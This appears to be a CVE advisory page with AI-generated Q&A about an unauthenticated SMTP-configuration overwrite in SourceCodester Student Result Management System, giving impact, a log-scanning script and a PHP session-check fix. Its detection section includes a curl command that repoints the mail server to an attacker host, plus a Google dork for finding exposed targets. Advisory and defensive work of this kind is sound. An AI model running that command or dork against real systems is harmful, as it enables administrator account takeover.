CVE-2026-2938
Improper Access Control in SourceCodester SRMS Allows Remote Exploit
Publication date: 2026-02-22
Last updated on: 2026-04-29
Assigner: VulDB
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| munyweki | student_result_management_system | 1.0 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-266 | A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor. |
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
Can you explain this vulnerability to me?
CVE-2026-2938 is a critical improper access control vulnerability in SourceCodester Student Result Management System 1.0, specifically in the administrative core script update_smtp.php. The vulnerability arises because the script does not perform any authentication or authorization checks before processing POST requests that update SMTP mail server settings.
This lack of access control allows unauthenticated remote attackers to send crafted requests to overwrite SMTP configuration parameters such as mail server, username, password, port, and security settings.
As a result, attackers can hijack the SMTP settings to redirect system emails, including password reset tokens, to a malicious server they control. This enables them to perform a full account takeover of the Super Administrator account.
Additionally, related vulnerabilities in the system allow unauthenticated attackers to inject bulk accounts and delete existing accounts, further compromising system integrity.
How can this vulnerability impact me?
This vulnerability can have severe impacts, including unauthorized full account takeover of the Super Administrator account by hijacking SMTP settings.
- Attackers can redirect password reset emails and other sensitive communications to their own servers.
- They can create arbitrary privileged accounts via unauthenticated bulk account injection.
- Attackers can delete critical user accounts, including administrators, causing denial of service.
Overall, the vulnerability allows remote unauthenticated attackers to fully compromise the confidentiality, integrity, and availability of the affected system.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking whether the administrative scripts, especially `/srms/script/admin/core/update_smtp.php`, accept unauthenticated POST requests that modify SMTP settings without proper session or privilege validation.
One detection method is to send a crafted POST request to the vulnerable endpoint and observe whether SMTP settings can be changed without authentication.
Additionally, network detection can involve searching for HTTP requests targeting the vulnerable script, for example by monitoring logs or using tools to detect POST requests to `/srms/script/admin/core/update_smtp.php` from unauthorized sources.
- Use curl to test an unauthorized POST request that updates SMTP settings: `curl -X POST -d "mail_server=smtp.attacker.com&mail_username=attacker&mail_password=pass&mail_port=25&mail_security=none" http://target/srms/script/admin/core/update_smtp.php`
- Search web server logs for POST requests to `/srms/script/admin/core/update_smtp.php` without valid session cookies.
- Use Google dorking to identify exposed vulnerable endpoints: `inurl:srms/script/admin/core/update_smtp.php`
[1, 2, 3]
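The log review suggested above, worked through as an added example that is not part of this page or the SRMS project: it parses constructed sample lines in an assumed Apache LogFormat that appends the request's Cookie header, and flags POSTs to the three admin core scripts named on this page that carry no PHP session cookie.

```python
import re
from collections import Counter

# Constructed sample access-log lines (assumption: an Apache LogFormat that
# appends the request's Cookie header in quotes; not taken from the page).
SAMPLE_LOG = """\
203.0.113.7 - - [22/Feb/2026:10:01:12 +0000] "POST /srms/script/admin/core/update_smtp.php HTTP/1.1" 200 512 "-"
192.0.2.10 - - [22/Feb/2026:10:02:45 +0000] "POST /srms/script/admin/core/update_smtp.php HTTP/1.1" 200 512 "PHPSESSID=a1b2c3d4"
203.0.113.7 - - [22/Feb/2026:10:03:01 +0000] "POST /srms/script/admin/core/import_users.php HTTP/1.1" 200 90 "-"
198.51.100.4 - - [22/Feb/2026:10:04:10 +0000] "GET /srms/index.php HTTP/1.1" 200 2048 "-"
203.0.113.7 - - [22/Feb/2026:10:05:33 +0000] "POST /srms/script/admin/core/drop_user.php HTTP/1.1" 302 0 "PHPSESSID=deadbeef"
"""

# The three admin core scripts named in this advisory's mitigation answer.
ADMIN_CORE_SCRIPTS = (
    "/srms/script/admin/core/update_smtp.php",
    "/srms/script/admin/core/import_users.php",
    "/srms/script/admin/core/drop_user.php",
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<cookie>[^"]*)"$'
)

def parse_line(line):
    """Return the named fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def has_session_cookie(cookie_header):
    # Presence of a PHP session id only; the log cannot tell whether it is valid.
    return "PHPSESSID=" in cookie_header

def find_unauthenticated_admin_posts(log_text):
    """Flag POSTs to the admin core scripts that carry no session cookie."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if (rec["method"] == "POST" and path in ADMIN_CORE_SCRIPTS
                and not has_session_cookie(rec["cookie"])):
            hits.append((rec["ip"], rec["ts"], path, rec["status"]))
    return hits

def summarize_by_source(hits):
    """Count flagged requests per client address, to prioritise triage."""
    return Counter(ip for ip, _, _, _ in hits)
```

A request that carries a session cookie is not flagged, so this only surfaces the fully unauthenticated case the advisory describes; whether a present session id is actually an administrator's must be checked server-side.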
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation requires implementing strict session-based access control checks in all affected scripts, especially in `/srms/script/admin/core/update_smtp.php`, `/srms/script/admin/core/import_users.php`, and `/srms/script/admin/core/drop_user.php`.
Specifically, the scripts should verify that a session exists and that the user has administrator privileges (level 0) before processing any requests.
If the checks fail, the script should log the unauthorized access attempt and redirect the user to the login page to prevent unauthorized actions.
- Add at the start of each vulnerable script:
```php
session_start();
// Only an authenticated session whose level is '0' (administrator) may continue.
if (!isset($_SESSION['level']) || $_SESSION['level'] != '0') {
    // Record the source address of the rejected request, then send the client back to the login page.
    error_log("Unauthorized access attempt from " . $_SERVER['REMOTE_ADDR']);
    header("location: ../../");
    exit();
}
```
Additionally, review and patch all administrative scripts to ensure proper authentication and authorization checks are in place before processing sensitive operations.
If possible, restrict access to these administrative endpoints via network controls or firewall rules until patches are applied.
[1]